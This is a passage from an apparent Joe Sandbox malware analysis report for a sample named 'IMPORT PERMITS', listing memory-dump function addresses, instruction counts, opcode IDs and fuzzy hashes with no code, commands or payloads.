                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                                • Instruction ID: 55087d5ab3feffc939e00fd0a9b4647e857da01576250d64de917fe578966cc2
                                                                                                                                • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                                • Instruction Fuzzy Hash: 25F030B2104644DFF722CF09D944F92BBF9EB15364F46C02AE6099B661D379EC40CBA4
                                                                                                                                Function 013E0710 Relevance: .0, Instructions: 28COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                                • Instruction ID: 2625199428be4cff8481fbc94c716ef9e85040b67b61b9a91213e0a2960fea8d
                                                                                                                                • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                                • Instruction Fuzzy Hash: D7F0E539304355DBDB1ACF29C050A957BE8FB55354F000059F9428B391D775F982CB50
                                                                                                                                Function 014149D0 Relevance: .0, Instructions: 28COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                                                • Instruction ID: 85ee51365d820a1d17edc84366f090f7d115980dbbca65e92e5fbd34fbaaf24b
                                                                                                                                • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                                                • Instruction Fuzzy Hash: 49E0D833244245ABD3211E598800B677BA5DBE07E0F1B042AE204CB264DB70DC41C7D8
                                                                                                                                Function 014B4164 Relevance: .0, Instructions: 27COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 207028095c48a8925cafc0a3044e77725831e8da8b415d1fa5574707b60ab14f
                                                                                                                                • Instruction ID: f8d20bdf0f179a74de469fb3b6f026213c385642f1a69d8322e1c43396c65e05
                                                                                                                                • Opcode Fuzzy Hash: 207028095c48a8925cafc0a3044e77725831e8da8b415d1fa5574707b60ab14f
                                                                                                                                • Instruction Fuzzy Hash: A9F0A031E265918FE7A2D76CE1C8B9277E0AB20634F1E0556D40687A27C330DC41C660
                                                                                                                                Function 0148678E Relevance: .0, Instructions: 27COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                                • Instruction ID: 393043a984449f5aa5f9fc613013b0d2820650430676141122265d928c335ece
                                                                                                                                • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                                • Instruction Fuzzy Hash: E4E0DF32A00110BBDB21A7998D01F9BBEACDBA0FA0F06005AB604E71E0E530DE00C6D0
                                                                                                                                Function 014B08C0 Relevance: .0, Instructions: 25COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                                                • Instruction ID: a6f53d4317bfb5515bdcdd2ccb7e740a1db32900aa20dcebf641efb77722c525
                                                                                                                                • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                                                • Instruction Fuzzy Hash: 7CE09B316403508FCB258A1ED180AD3B7F8DFA5661F15847FE90547722C231F942C6F0
                                                                                                                                Function 013E25E0 Relevance: .0, Instructions: 23COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: ed0b18591cd3d5f87dc1d1e60c20203a164652705f72bc8756c814983c188225
                                                                                                                                • Instruction ID: a1c8063c22f8c78b28c05912b215fc38757b032c25965bab529f1b48e5486f84
                                                                                                                                • Opcode Fuzzy Hash: ed0b18591cd3d5f87dc1d1e60c20203a164652705f72bc8756c814983c188225
                                                                                                                                • Instruction Fuzzy Hash: 91E092321006649BC721BF2EDD05F9B7BDAEB64364F014519F115571A0CA74A950C784
                                                                                                                                Function 0149A456 Relevance: .0, Instructions: 23COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                                • Instruction ID: 0cc4da43f23e142eb4842df733b12e14d70b46ec2fede57b5fd04b75150c3a79
                                                                                                                                • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                                • Instruction Fuzzy Hash: 96E0ED31011652DBEB366F2BD958B527EA1AFA0711F258C2EA19A125B0C7B598D1CA40
                                                                                                                                Function 01464000 Relevance: .0, Instructions: 22COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                                • Instruction ID: 7b45ed5b5649f9452d20f2a31aa16f6f74e176172d793896a243646b4c712eb1
                                                                                                                                • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                                • Instruction Fuzzy Hash: D2E0C2743003168FEB15CF19C040B637BBABFD5A14F28C069A9488F305EB32E842CB41
                                                                                                                                Function 013D823B Relevance: .0, Instructions: 21COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                                • Instruction ID: ce839e87121b7e7c30200246c994c45a5c572926ac59a5f9bc3de9ff0815235d
                                                                                                                                • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                                • Instruction Fuzzy Hash: D5E0C232500A25EFDB322F2AEC00F527AA9FFB8B54F11486EE081064B487B0BCC1CB44
                                                                                                                                Function 013E2050 Relevance: .0, Instructions: 20COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: de1113b9a7922622b3c17362929a484a9e58603fa7526b95786768659bf9a8a6
                                                                                                                                • Instruction ID: 5480cc6e257e28c643a0467b639754a508a79220831e9e53d30b15d8ef7eaaf3
                                                                                                                                • Opcode Fuzzy Hash: de1113b9a7922622b3c17362929a484a9e58603fa7526b95786768659bf9a8a6
                                                                                                                                • Instruction Fuzzy Hash: 75E08C321006606BCA11FA5DDD10F5A739EEBA4264F010225B154972E0CA64AC00C794
                                                                                                                                Function 0141E59C Relevance: .0, Instructions: 16COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                • Instruction ID: f247a43b6ae8baea8dfe185e332874257d486859c1adfb2ac05d44066b31858d
                                                                                                                                • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                • Instruction Fuzzy Hash: ECD0A932204620ABDB72AA1CFC00FC333E8BB88764F06085AB008C7161C360AC81CA84
                                                                                                                                Function 0145E908 Relevance: .0, Instructions: 16COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                                • Instruction ID: afbba54696ee45960072f4c2a3ae8b3091606fc634a5f76f975fe65f0f15b413
                                                                                                                                • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                                • Instruction Fuzzy Hash: 10E0EC359507859BDF52DF5DC644F5EFBF5BB94B40F150058A5086B671C634A900CB40
                                                                                                                                Function 013DA0E3 Relevance: .0, Instructions: 15COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                • Instruction ID: 806b098c3655b39e4bd1809cd46a366d0b1525bd400fbb67e0f8895a01c99fa2
                                                                                                                                • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                • Instruction Fuzzy Hash: 22D0123321607197DF29566A7A14F677919AB81A98F1A006D750A93944C5158C42D6E0
                                                                                                                                Function 0141A830 Relevance: .0, Instructions: 14COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                • Instruction ID: bf16f9e8c974a67174154fae910c2d725d4d6b0c40653ba9159a9eed5c2a703b
                                                                                                                                • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                • Instruction Fuzzy Hash: 52D012371D054DBBCF119F66DC01F957BA9E764BA0F454020B604875A0C63AE950D584
                                                                                                                                Function 0141CA24 Relevance: .0, Instructions: 14COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3ef6e55c246dcdfdb510b9b4cc84bf6a65c8a6cc6dd25e0d98a87491a76da5d2
                                                                                                                                • Instruction ID: aab3cc93b5487f29796c7f5b2a991a0a87ddd4695479a80e7c1d172330e8b6ee
                                                                                                                                • Opcode Fuzzy Hash: 3ef6e55c246dcdfdb510b9b4cc84bf6a65c8a6cc6dd25e0d98a87491a76da5d2
                                                                                                                                • Instruction Fuzzy Hash: F0D05E315450128BDF17CB09CA50A2A3A70EB10680B40007DEF4051131E334D801C640
                                                                                                                                Function 013F02A0 Relevance: .0, Instructions: 13COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                • Instruction ID: 356fb880bb2cfd9e34d17d6dab285438a5f7f0fb87251c5c253fd07446410fcb
                                                                                                                                • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                • Instruction Fuzzy Hash: 71D0C939252E80DFD61BCB0CC5A4B1533A4FB44B48F850494F501CBB22D63CD940CA10
                                                                                                                                Function 0141C700 Relevance: .0, Instructions: 12COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                • Instruction ID: e5ceeee814a52028009be4ebec16219588ae169734372387a4955d2d5ae858b9
                                                                                                                                • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                • Instruction Fuzzy Hash: 62C08C33290648AFCB12EF99CD01F027BA9FBA8B40F010021F3048B670C631FC20EA84
                                                                                                                                Function 01400310 Relevance: .0, Instructions: 11COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                • Instruction ID: 86d4db5a411716b968711ac5c449076424fc4c23d27106d7bdcb0c8601ee26e3
                                                                                                                                • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                • Instruction Fuzzy Hash: DED01236100248EFCB02DF42C890E9A772AFBD8750F108019FD1907650CA31ED62DA50
                                                                                                                                Function 013E0750 Relevance: .0, Instructions: 9COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                • Instruction ID: 3e3ed896c284b768e93881b6688360dff22dbba10170663cacd677848c24688f
                                                                                                                                • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                • Instruction Fuzzy Hash: D5C04879702A428FCF16DB2ED294F4A77E4FB88744F150890E905DBB22E624E801CA10
                                                                                                                                Function 01424340 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 19e80cabd889b4c04940b3c963864b793c924e3317231c66fe4bd4da5915007f
                                                                                                                                • Instruction ID: 69c590a9c44920f236293ee1d4c06d15e05e5c1cf74eafb4be94e0672d66c2a6
                                                                                                                                • Opcode Fuzzy Hash: 19e80cabd889b4c04940b3c963864b793c924e3317231c66fe4bd4da5915007f
                                                                                                                                • Instruction Fuzzy Hash: 18900231605801129140715848845468015A7F4301B55C112F0428555CCB248A576361
                                                                                                                                Function 01424650 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 30bced94cbc2505ea376cf6cf78354b76cce93d0a9b888aa34bba8ab42df4454
                                                                                                                                • Instruction ID: f8abecd3445c4f4955a34f819a006587d6ce9b492aae137dcbc9dedeb2feeb25
                                                                                                                                • Opcode Fuzzy Hash: 30bced94cbc2505ea376cf6cf78354b76cce93d0a9b888aa34bba8ab42df4454
                                                                                                                                • Instruction Fuzzy Hash: FF90026160150142414071584804406A015A7F5301395C216B0558561CC7288956A369
                                                                                                                                Function 01422BE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f778b6bb3fb22bf64a6bab764e1cdc0ac667b919deb2a2e96e004abd13601787
                                                                                                                                • Instruction ID: 8903cc4c73dc2c0898de3018ef0875d595758e46040844eb68ebbf4c0b516668
                                                                                                                                • Opcode Fuzzy Hash: f778b6bb3fb22bf64a6bab764e1cdc0ac667b919deb2a2e96e004abd13601787
                                                                                                                                • Instruction Fuzzy Hash: BD90023120544942D14071584404A46402597E4305F55C112B0068695DD7358E56B761
                                                                                                                                Function 01422BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6fa1862f6f73bc7b88701fddbff5e8f50d2ebcbe4826054285a63210e36afead
                                                                                                                                • Instruction ID: 28ebfb8b88bd57ee2a1ad15e7383e8e95e4e2f268f74eb741dc159636ddc5146
                                                                                                                                • Opcode Fuzzy Hash: 6fa1862f6f73bc7b88701fddbff5e8f50d2ebcbe4826054285a63210e36afead
                                                                                                                                • Instruction Fuzzy Hash: 3E90023120140902D1807158440464A401597E5301F95C116B0029655DCB258B5A77A1
                                                                                                                                Function 01422B80 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 13514f6c0d176fcaa914c8bbd7274d5b554d020aec8b29999315347730566ec2
                                                                                                                                • Instruction ID: 7430c19b19d8ed4688abee2f0d9c2097cb3073351078376a4f1123b83a051543
                                                                                                                                • Opcode Fuzzy Hash: 13514f6c0d176fcaa914c8bbd7274d5b554d020aec8b29999315347730566ec2
                                                                                                                                • Instruction Fuzzy Hash: E790023120140902D10471584804686401597E4301F55C112B6028656ED77589927231
                                                                                                                                Function 01422BA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3c909de3138171fd38ca2ccdb1ebf60e9b3759ebabcb0250c00962552d1167b5
                                                                                                                                • Instruction ID: d714ce3de732fe5848ce540e34380a2a66dd0455487e07365727fb2bca04a1ea
                                                                                                                                • Opcode Fuzzy Hash: 3c909de3138171fd38ca2ccdb1ebf60e9b3759ebabcb0250c00962552d1167b5
                                                                                                                                • Instruction Fuzzy Hash: F190023160540902D15071584414746401597E4301F55C112B0028655DC7658B5677A1
                                                                                                                                Function 01422AD0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c887c343bfe8b8e935d7cad4c6adba2de27e40675fabba4f64b503ea7f21c9f3
                                                                                                                                • Instruction ID: b4b24602eff4de75b32a9a2584020c276a37e16691a9c1f26dbbc244403c584b
                                                                                                                                • Opcode Fuzzy Hash: c887c343bfe8b8e935d7cad4c6adba2de27e40675fabba4f64b503ea7f21c9f3
                                                                                                                                • Instruction Fuzzy Hash: 16900225211401030105B5580704507405697E9351355C122F1019551CD73189626221
                                                                                                                                Function 01422AF0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: aa460292f46ae8d78622d8eb1eab3c9de9de88f2e347555704302323b29237b0
                                                                                                                                • Instruction ID: 095b08fee13635d97f9c1557f1667492553fe8fec348cc6c81352ef639dbf739
                                                                                                                                • Opcode Fuzzy Hash: aa460292f46ae8d78622d8eb1eab3c9de9de88f2e347555704302323b29237b0
                                                                                                                                • Instruction Fuzzy Hash: 9D900225221401020145B558060450B4455A7EA351395C116F141A591CC73189666321
                                                                                                                                Function 01422AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: fe90916fed09c4d5beae8cd244841ad7f4c210d5384b8068303c3962350687cb
                                                                                                                                • Instruction ID: 82796e9b5a94e9c014e7b4c54e9706a0a352edb533a7fb15c8ad7b86eeb2f13c
                                                                                                                                • Opcode Fuzzy Hash: fe90916fed09c4d5beae8cd244841ad7f4c210d5384b8068303c3962350687cb
                                                                                                                                • Instruction Fuzzy Hash: 3B9002A1201541924500B2588404B0A851597F4201B55C117F1058561CC6358952A235
